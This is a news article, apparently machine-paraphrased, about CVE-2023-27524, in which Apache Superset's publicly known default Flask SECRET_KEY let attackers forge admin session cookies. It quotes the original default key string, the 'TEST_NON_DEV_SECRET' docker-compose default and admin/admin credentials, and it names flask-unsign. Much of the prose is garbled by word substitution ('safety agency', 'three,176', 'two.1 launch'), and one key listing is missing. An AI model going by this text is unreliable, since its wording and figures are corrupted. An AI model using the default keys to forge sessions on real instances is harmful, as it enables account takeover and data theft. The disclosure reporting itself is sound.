Apache Superset: A narrative of insecure default keys, 1000’s of weak techniques, few paying consideration

Apache Superset till earlier this 12 months shipped with an insecure default configuration that miscreants may exploit to login and take over the info visualization utility, steal knowledge, and execute malicious code.

The open supply utility, primarily based on Python’s Flask framework, defaulted to a publicly recognized secret key:

SECRET_KEY = '21thisismyscretkey12eyyh'

In an advisory on Tuesday, safety agency Horizon3.ai defined that when a person logs right into a Superset occasion, the net utility sends a session cookie with a person identifier again to the customer’s net browser.

“The net utility indicators the cookie with a SECRET_KEY, a worth that’s presupposed to be randomly generated and sometimes saved in a neighborhood configuration file,” stated Naveen Sunkavally, chief architect at Horizon3.ai.

If an attacker is aware of the worth of SECRET_KEY, that particular person can then generate and signal cookies, successfully authenticating because the app administrator. And it seems to be trivial to examine whether or not Superset is utilizing the default key with a device referred to as flask-unsign.

In response to Sunkavally, about two-thirds of these utilizing the software program didn’t generate a brand new key when organising Superset: as of October 11, 2021, the applying had virtually 3,000 cases uncovered to the web, about 2,000 of which relied on the default secret key.

The Apache safety staff responded the next day and by January 11, 2022, made some adjustments, which established a brand new default secret key:


However this time the app included a examine to see whether or not the brand new default remained unchanged. In that case, the app issued a warning to the app’s log file, with directions for methods to generate a safe key. Heeding the warning, nonetheless, was left to customers.

Greater than a 12 months after this modification was made, on February 9, 2023, Horizon3.ai once more checked to see what number of Superset cases have been configuring their app with a public default secret key. This time they expanded their Shodan.io search to 4 completely different default keys – the unique, the brand new one, and two others – one from a deployment template and one from the documentation.

And never a lot had modified. Out of three,176 Superset cases, 2,124 (~67 p.c) have been utilizing one of many 4 default keys.

So Horizon3.ai contacted the Apache safety staff once more. And two weeks later, on February 24, 2023, the challenge maintainers dedicated an replace that may ship as a part of the two.1 launch on April 5, 2023, to “impose harsher measures when a default SECRET_KEY is recognized.”

The change made it so the app wouldn’t begin with a default key.

“With this replace, many new customers of Superset will now not unintentionally shoot themselves within the foot,” stated Sunkavally, who cautioned that it is nonetheless potential to finish up with an insecure model of Superset if the software program is put in by way of a docker-compose file or a helm template.

“The docker-compose file incorporates a brand new default SECRET_KEY of TEST_NON_DEV_SECRET that we suspect some customers will unwittingly run Superset with. Some configurations additionally set admin/admin because the default credential for the admin person.”

The Superset vulnerability was disclosed as CVE-2023-27524 on Monday. Sunkavally stated involved Superset customers can examine to see whether or not their server has a default key with this script that depends on flask-unsign.

The two,000+ weak Superset cases recognized have been operated by corporations massive and small, authorities companies, and universities, in keeping with Sunkavally, who added that a few of these organizations addressed the vulnerability after being notified about it.

Sunkavally stated this episode illustrates that customers don’t learn documentation and do not learn logs. “The most effective strategy is to take the selection away from customers and require them to take deliberate actions to be purposefully insecure,” he stated. ®